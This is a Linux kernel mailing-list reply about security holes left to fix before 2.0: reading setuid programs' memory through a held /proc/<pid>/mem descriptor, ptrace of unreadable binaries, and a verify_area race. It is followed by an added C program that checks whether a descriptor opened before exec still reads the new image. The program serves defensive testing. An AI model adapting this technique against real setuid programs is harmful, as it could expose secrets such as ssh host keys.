Thanks for that. I'll put it in the Documentation directory as
a note about buggy NCSA stuff.
> Now back to things to fix before 2.0:
>
> - /proc is still insecure :-(. You can open /proc/<pid>/mem and
> hold the file descriptor, then have the target process exec some
> setuid/setgid/unreadable program and read its memory at will.
> Not good for things like ssh - the secret host key is there...
Arghhh... Linus ????. We definitely need to break the association for
setuid/setgid apps. It wouldn't actually be hard to do.
> - somewhat related: it shouldn't be possible to ptrace unreadable
> programs (just like set[ug]id), they may be unreadable for a reason
> like encryption key compiled in, etc. Also, ld.so needs some way
> to know the program is unreadable so it won't accept LD_xxx (this
> may need kernel support, syscall to read the dumpable flag maybe?)
There are millions of these, core dumping etc. It's basically, I think, a
Unix feature. At least we don't have compiled-in passwords like GCOS3
had.
> - do we still have the verify_area/memcpy race? (I guess yes, but
> I hope I am wrong... what if the area is unmapped while the process
> sleeps between verify_area and memcpy?)
You can get a non-fatal Oops out of that, yes. The ftruncate disk corruption
bug is gone.
> - bad_user_access_length should be available to modules for old gcc
> users, in ksyms.c or perhaps as inline function conditional on the
> version of gcc? (otherwise at least ncpfs won't load)
Use gcc 2.7.x - 2.5.8 miscompiles stuff in the current kernel.
Alan
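
The /proc/<pid>/mem problem in the first quoted item is easy to probe on
whatever kernel you are running. The program below is an added example, not
code from this thread or from the kernel: it forks a child that plants a
constructed stand-in "secret" in a global, opens the child's /proc/<pid>/mem
while the child is still the original image and confirms the secret can be
read, then lets the child exec /bin/sleep (a stand-in for the setuid target,
since what matters here is that exec installs a fresh address space) and
reads the new image through the descriptor it kept open. It reports a leak
only if that second read returns data. The function and variable names, the
stand-in secret, the use of /bin/sleep and the 3 s polling budget are all
assumptions of the example; it needs a mounted /proc and permission to read a
child's memory (Yama ptrace_scope 1 or lower), and says "unavailable" rather
than guessing when it cannot establish the baseline.

```c
/* Added example, not from the thread: does a /proc/<pid>/mem descriptor opened
 * before exec still read after it?  Names, the secret and /bin/sleep are assumptions. */
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

enum probe_result { PROBE_UNAVAILABLE = -1, PROBE_SEALED = 0, PROBE_LEAK = 1 };

/* Constructed stand-in for the secret the thread worries about (an ssh host
 * key). fork() gives parent and child the same layout, so &secret is a valid
 * address in the child; the child overwrites it with child_secret so that a
 * matching read proves we saw the child's memory, not our own copy. */
#define SECRET_LEN 24
static char secret[SECRET_LEN] = "parent-copy-of-the-buf";
static const char child_secret[SECRET_LEN] = "SSH-HOST-KEY-STAND-IN-1";

/* 1 once /proc/<pid>/comm names the image we expect the child to exec. */
static int comm_is(pid_t pid, const char *want)
{
    char path[64], comm[64];
    snprintf(path, sizeof path, "/proc/%d/comm", (int)pid);
    int fd = open(path, O_RDONLY);
    if (fd < 0) return 0;
    ssize_t n = read(fd, comm, sizeof comm - 1);
    close(fd);
    if (n <= 0) return 0;
    comm[n] = '\0';
    return strncmp(comm, want, strlen(want)) == 0;
}

/* Start of the first readable, file-backed mapping in /proc/<pid>/maps:
 * a page belonging to the image the child is running *now*. */
static int readable_file_mapping(pid_t pid, unsigned long long *start)
{
    char path[64], line[512];
    int found = 0;
    snprintf(path, sizeof path, "/proc/%d/maps", (int)pid);
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    while (!found && fgets(line, sizeof line, f)) {   /* "lo-hi perms off dev ino path" */
        char *end, *perms;
        unsigned long long lo = strtoull(line, &end, 16);
        perms = (*end == '-') ? strchr(end, ' ') : NULL;
        if (perms && perms[1] == 'r' && strchr(perms, '/')) { *start = lo; found = 1; }
    }
    fclose(f);
    return found;
}

int probe_proc_mem_across_exec(void)
{
    int p2c[2], c2p[2], mem_fd = -1, result = PROBE_UNAVAILABLE, alive = 1, i;
    char c, buf[SECRET_LEN], path[64];
    unsigned long long addr;
    pid_t pid;
    if (pipe(p2c) < 0 || pipe(c2p) < 0 || (pid = fork()) < 0) return PROBE_UNAVAILABLE;
    if (pid == 0) {                                  /* child: the target process */
        close(p2c[1]); close(c2p[0]);
        memcpy(secret, child_secret, SECRET_LEN);
        if (write(c2p[1], "R", 1) != 1 || read(p2c[0], &c, 1) != 1) _exit(126);
        /* Stand-in for the setuid target: any exec installs a fresh mm. */
        execl("/bin/sleep", "sleep", "30", (char *)NULL);
        _exit(127);
    }
    close(p2c[0]); close(c2p[1]);
    if (read(c2p[0], &c, 1) != 1 || c != 'R') goto out;

    snprintf(path, sizeof path, "/proc/%d/mem", (int)pid);
    mem_fd = open(path, O_RDONLY);                   /* the access check happens here */
    if (mem_fd < 0) goto out;
    /* Baseline: before exec the descriptor must show the child's secret. */
    if (pread(mem_fd, buf, SECRET_LEN, (off_t)(uintptr_t)secret) != SECRET_LEN ||
        memcmp(buf, child_secret, SECRET_LEN) != 0) goto out;

    /* Let the child exec, then wait until it is running the new image. */
    if (write(p2c[1], "G", 1) != 1) goto out;
    for (i = 0; i < 300; i++, usleep(10000)) {       /* up to ~3 s */
        if (waitpid(pid, NULL, WNOHANG) != 0) { alive = 0; goto out; }  /* exec failed */
        if (comm_is(pid, "sleep") && readable_file_mapping(pid, &addr)) break;
    }
    if (i == 300) goto out;
    /* The attack from the thread: read the *new* image through the held fd; any data back means it followed the exec. */
    result = pread(mem_fd, buf, sizeof buf, (off_t)addr) > 0 ? PROBE_LEAK : PROBE_SEALED;
out:
    if (mem_fd >= 0) close(mem_fd);
    close(p2c[1]); close(c2p[0]);
    if (alive) { kill(pid, SIGKILL); waitpid(pid, NULL, 0); }
    return result;
}

int main(void)
{
    int r = probe_proc_mem_across_exec();
    puts(r == PROBE_LEAK ? "LEAK: the held fd reads the image the child exec'd into" :
         r == PROBE_SEALED ? "sealed: the held fd returns no data after exec" : "unavailable");
    return r == PROBE_LEAK;
}
```

Note what the probe cannot show: with a non-setuid target a fresh open of
/proc/<pid>/mem after the exec would also succeed, so the only question it
answers is whether a descriptor opened before the exec keeps following the
process into its new image, which is the half of the attack the kernel has
to break.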